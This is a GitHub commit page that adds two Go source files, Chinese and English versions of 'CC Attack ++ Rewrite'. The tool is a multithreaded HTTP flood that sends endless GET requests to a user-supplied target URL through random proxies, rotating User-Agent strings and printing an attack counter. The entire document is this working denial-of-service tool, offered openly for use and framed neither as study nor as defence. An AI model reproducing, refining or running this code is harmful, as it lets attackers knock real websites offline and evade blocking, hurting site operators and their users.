-
Notifications
You must be signed in to change notification settings - Fork 6
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
2 changed files
with
368 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,184 @@ | ||
// 程序 : CC Attack ++ Rewrite Chinese | ||
// 作者 : MasonDye | ||
// 版本 : 2.2.3 | ||
// GitHub : https://github.com/MasonDye/CC-Attack-Rewrite | ||
|
||
package main | ||
|
||
import ( | ||
"bufio" | ||
"flag" | ||
"fmt" | ||
"net/http" | ||
"os" | ||
"strings" | ||
"sync" | ||
"time" | ||
"net/url" | ||
"math/rand" | ||
) | ||
|
||
var version = "2.2.2 (Mainland China) (BUILD 2023/11/29 12:00)" | ||
|
||
func main() { | ||
targetURL := flag.String("url", "", "目标攻击网址") | ||
requestInterval := flag.Int("speed", 100, "攻击速度(ms)") | ||
timeout := flag.Int("timeout", 2500, "请求超时 (ms)") | ||
userAgentFile := flag.String("ua", "", "User-Agent(用户代理) 池 相对地址 (txt)") | ||
proxyListFile := flag.String("ip", "", "IP 代理池(http) 相对地址 (txt)") | ||
threadCount := flag.Int("thread", 2, "线程数") | ||
|
||
flag.Parse() | ||
|
||
if *targetURL == "" { | ||
fmt.Println("\033[31mCC Attack ++ Rewrite 简体中文 \033[34m版本:", version, "\033[0m") | ||
fmt.Println("\033[32m作者: MasonDye\033[0m") | ||
fmt.Println("\033[32mGitHub: https://github.com/MasonDye/CC-Attack-Rewrite\033[0m") | ||
fmt.Println() // 添加空行 | ||
|
||
fmt.Println("\033[31m用法:\033[0m") | ||
flag.VisitAll(func(f *flag.Flag) { | ||
fmt.Printf("\033[32m -%s\033[0m\n %s\n", f.Name, f.Usage) | ||
}) | ||
return | ||
} | ||
|
||
var proxyList []string | ||
if *proxyListFile != "" { | ||
var err error | ||
proxyList, err = readProxyList(*proxyListFile) | ||
if err != nil { | ||
fmt.Println("读法读取IP池文件:", err) | ||
return | ||
} | ||
} | ||
|
||
userAgent := "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" | ||
if *userAgentFile != "" { | ||
userAgentList, err := readUserAgentList(*userAgentFile) | ||
if err != nil { | ||
fmt.Println("无法读取 User-Agent 文件:", err) | ||
return | ||
} | ||
rand.Seed(time.Now().UnixNano()) | ||
userAgent = getRandomUserAgent(userAgentList) | ||
} | ||
|
||
successCount := 0 | ||
|
||
var wg sync.WaitGroup // 添加等待组 | ||
|
||
// 打印 欢迎以及版本 | ||
fmt.Println("\033[32mCC Attack ++ 中国大陆版 \033[31m|\033[34m 版本:", version, "\033[0m") | ||
|
||
// 打印开始攻击提示 | ||
fmt.Println("\033[31m开始攻击!\033[0m") | ||
|
||
proxyCount := len(proxyList) // 代理计数 | ||
|
||
for i := 0; i < *threadCount; i++ { | ||
wg.Add(1) | ||
go func() { | ||
defer wg.Done() | ||
|
||
client := &http.Client{ | ||
Timeout: time.Duration(*timeout) * time.Millisecond, | ||
} | ||
|
||
for { | ||
if proxyCount > 0 { // 如果代理可用 | ||
proxyURL := getRandomProxy(proxyList) | ||
transport := &http.Transport{ | ||
Proxy: http.ProxyURL(proxyURL), | ||
} | ||
client.Transport = transport | ||
} | ||
|
||
req, err := http.NewRequest("GET", *targetURL, nil) | ||
if err != nil { | ||
fmt.Println("请求创建失败:", err) | ||
return | ||
} | ||
|
||
req.Header.Set("User-Agent", userAgent) | ||
|
||
resp, err := client.Do(req) | ||
if err != nil { | ||
fmt.Println("请求发送失败:", err) | ||
continue | ||
} | ||
|
||
successCount++ | ||
// 打印攻击信息 | ||
fmt.Printf("\033[31m请求:%d \033[0m|\033[31m 目标:%s \033[0m|\033[31m 线程:%d \033[0m|\033[31m 速度:%d \033[0m|\033[31m 超时:%d \033[0m\n", successCount, *targetURL, *threadCount, *requestInterval, *timeout) | ||
|
||
resp.Body.Close() | ||
|
||
time.Sleep(time.Duration(*requestInterval) * time.Millisecond) | ||
} | ||
}() | ||
} | ||
|
||
wg.Wait() // 等待所有协程执行完成 | ||
} | ||
|
||
func readProxyList(filename string) ([]string, error) { | ||
file, err := os.Open(filename) | ||
if err != nil { | ||
return nil, err | ||
} | ||
defer file.Close() | ||
|
||
var proxyList []string | ||
scanner := bufio.NewScanner(file) | ||
for scanner.Scan() { | ||
proxy := strings.TrimSpace(scanner.Text()) | ||
proxyList = append(proxyList, proxy) | ||
} | ||
|
||
if err := scanner.Err(); err != nil { | ||
return nil, err | ||
} | ||
|
||
return proxyList, nil | ||
} | ||
|
||
func readUserAgentList(filename string) ([]string, error) { | ||
file, err := os.Open(filename) | ||
if err != nil { | ||
return nil, err | ||
} | ||
defer file.Close() | ||
|
||
var userAgentList []string | ||
scanner := bufio.NewScanner(file) | ||
for scanner.Scan() { | ||
userAgent := strings.TrimSpace(scanner.Text()) | ||
userAgentList = append(userAgentList, userAgent) | ||
} | ||
|
||
if err := scanner.Err(); err != nil { | ||
return nil, err | ||
} | ||
|
||
return userAgentList, nil | ||
} | ||
|
||
func getRandomProxy(proxyList []string) *url.URL { | ||
if len(proxyList) == 0 { | ||
return nil | ||
} | ||
|
||
randIndex := rand.Intn(len(proxyList)) | ||
proxyURL, _ := url.Parse("http://" + proxyList[randIndex]) | ||
return proxyURL | ||
} | ||
|
||
func getRandomUserAgent(userAgentList []string) string { | ||
if len(userAgentList) == 0 { | ||
return "" | ||
} | ||
|
||
randIndex := rand.Intn(len(userAgentList)) | ||
return userAgentList[randIndex] | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,184 @@ | ||
// Name : CC Attack ++ Rewrite | ||
// Author : MasonDye | ||
// Version : 2.2.3 | ||
// GitHub : https://github.com/MasonDye/CC-Attack-Rewrite | ||
|
||
package main | ||
|
||
import ( | ||
"bufio" | ||
"flag" | ||
"fmt" | ||
"net/http" | ||
"os" | ||
"strings" | ||
"sync" | ||
"time" | ||
"net/url" | ||
"math/rand" | ||
) | ||
|
||
var version = "2.2.2 (BUILD 2023/11/29 12:00)" | ||
|
||
func main() { | ||
targetURL := flag.String("url", "", "Attack URL") | ||
requestInterval := flag.Int("speed", 100, "Attack Speed(ms)") | ||
timeout := flag.Int("timeout", 2500, "Request Timeout (ms)") | ||
userAgentFile := flag.String("ua", "", "User-Agent Pool Path (txt)") | ||
proxyListFile := flag.String("ip", "", "IP Pool Path (txt)") | ||
threadCount := flag.Int("thread", 2, "thread") | ||
|
||
flag.Parse() | ||
|
||
if *targetURL == "" { | ||
fmt.Println("\033[31mCC Attack ++ Rewrite \033[34mVersion:", version, "\033[0m") | ||
fmt.Println("\033[32mAuthor: MasonDye\033[0m") | ||
fmt.Println("\033[32mGitHub: https://github.com/MasonDye/CC-Attack-Rewrite\033[0m") | ||
fmt.Println() // Add blank line | ||
|
||
fmt.Println("\033[31mUsage:\033[0m") | ||
flag.VisitAll(func(f *flag.Flag) { | ||
fmt.Printf("\033[32m -%s\033[0m\n %s\n", f.Name, f.Usage) | ||
}) | ||
return | ||
} | ||
|
||
var proxyList []string | ||
if *proxyListFile != "" { | ||
var err error | ||
proxyList, err = readProxyList(*proxyListFile) | ||
if err != nil { | ||
fmt.Println("Failed to read IP Pool file:", err) | ||
return | ||
} | ||
} | ||
|
||
userAgent := "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" | ||
if *userAgentFile != "" { | ||
userAgentList, err := readUserAgentList(*userAgentFile) | ||
if err != nil { | ||
fmt.Println("Failed to read User-Agent file:", err) | ||
return | ||
} | ||
rand.Seed(time.Now().UnixNano()) | ||
userAgent = getRandomUserAgent(userAgentList) | ||
} | ||
|
||
successCount := 0 | ||
|
||
var wg sync.WaitGroup // Add Wait Group | ||
|
||
// Welcome and version | ||
fmt.Println("\033[32mCC Attack ++ \033[31m|\033[34m Version:", version, "\033[0m") | ||
|
||
// Print attack start | ||
fmt.Println("\033[31mStart Attack!\033[0m") | ||
|
||
proxyCount := len(proxyList) // Proxy Count | ||
|
||
for i := 0; i < *threadCount; i++ { | ||
wg.Add(1) | ||
go func() { | ||
defer wg.Done() | ||
|
||
client := &http.Client{ | ||
Timeout: time.Duration(*timeout) * time.Millisecond, | ||
} | ||
|
||
for { | ||
if proxyCount > 0 { // If proxy available | ||
proxyURL := getRandomProxy(proxyList) | ||
transport := &http.Transport{ | ||
Proxy: http.ProxyURL(proxyURL), | ||
} | ||
client.Transport = transport | ||
} | ||
|
||
req, err := http.NewRequest("GET", *targetURL, nil) | ||
if err != nil { | ||
fmt.Println("Request creation failed:", err) | ||
return | ||
} | ||
|
||
req.Header.Set("User-Agent", userAgent) | ||
|
||
resp, err := client.Do(req) | ||
if err != nil { | ||
fmt.Println("Request failed to send:", err) | ||
continue | ||
} | ||
|
||
successCount++ | ||
// Print attack info | ||
fmt.Printf("\033[31mRequested:%d \033[0m|\033[31m URL:%s \033[0m|\033[31m Thread:%d \033[0m|\033[31m Speed:%d \033[0m|\033[31m Timeout:%d \033[0m\n", successCount, *targetURL, *threadCount, *requestInterval, *timeout) | ||
|
||
resp.Body.Close() | ||
|
||
time.Sleep(time.Duration(*requestInterval) * time.Millisecond) | ||
} | ||
}() | ||
} | ||
|
||
wg.Wait() // Waiting for all co-programs to finish executing | ||
} | ||
|
||
func readProxyList(filename string) ([]string, error) { | ||
file, err := os.Open(filename) | ||
if err != nil { | ||
return nil, err | ||
} | ||
defer file.Close() | ||
|
||
var proxyList []string | ||
scanner := bufio.NewScanner(file) | ||
for scanner.Scan() { | ||
proxy := strings.TrimSpace(scanner.Text()) | ||
proxyList = append(proxyList, proxy) | ||
} | ||
|
||
if err := scanner.Err(); err != nil { | ||
return nil, err | ||
} | ||
|
||
return proxyList, nil | ||
} | ||
|
||
func readUserAgentList(filename string) ([]string, error) { | ||
file, err := os.Open(filename) | ||
if err != nil { | ||
return nil, err | ||
} | ||
defer file.Close() | ||
|
||
var userAgentList []string | ||
scanner := bufio.NewScanner(file) | ||
for scanner.Scan() { | ||
userAgent := strings.TrimSpace(scanner.Text()) | ||
userAgentList = append(userAgentList, userAgent) | ||
} | ||
|
||
if err := scanner.Err(); err != nil { | ||
return nil, err | ||
} | ||
|
||
return userAgentList, nil | ||
} | ||
|
||
func getRandomProxy(proxyList []string) *url.URL { | ||
if len(proxyList) == 0 { | ||
return nil | ||
} | ||
|
||
randIndex := rand.Intn(len(proxyList)) | ||
proxyURL, _ := url.Parse("http://" + proxyList[randIndex]) | ||
return proxyURL | ||
} | ||
|
||
func getRandomUserAgent(userAgentList []string) string { | ||
if len(userAgentList) == 0 { | ||
return "" | ||
} | ||
|
||
randIndex := rand.Intn(len(userAgentList)) | ||
return userAgentList[randIndex] | ||
} |